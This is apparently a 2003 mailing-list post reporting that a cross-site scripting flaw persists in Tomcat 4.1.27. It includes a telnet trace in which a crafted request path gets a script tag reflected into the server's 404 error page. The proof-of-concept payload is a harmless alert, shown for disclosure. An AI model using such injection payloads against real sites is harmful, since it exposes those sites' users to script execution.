Anyone know how serious this is?
It also appears to affect Tomcat 4.1.27 when using mod_jk as well. Below
is a sample trace of a HTTP session.
> telnet localhost 8080
Connected to localhost.
Escape character is '^]'.
GET /666%0a%0a666.jsp HTTP/1.0
HTTP/1.1 404 /666
Date: Mon, 29 Sep 2003 18:39:23 GMT
Server: Apache Coyote/1.0
Apache Tomcat/4.1.27 - Error
HTTP Status 404 - /666
type Status report
The requested resource (/666
<script>alert("asdf");</script>666.jsp) is not
Tomcat/4.1.27Connection closed by foreign host.
On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
> reported last year, is not yet resolved.
> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
> On the other hand, on Tomcat 5.0, it was not reproduced.
> Do you neglect to resolve it to Tomcat 4.x, Tomcat committers?
> Kan Ogawa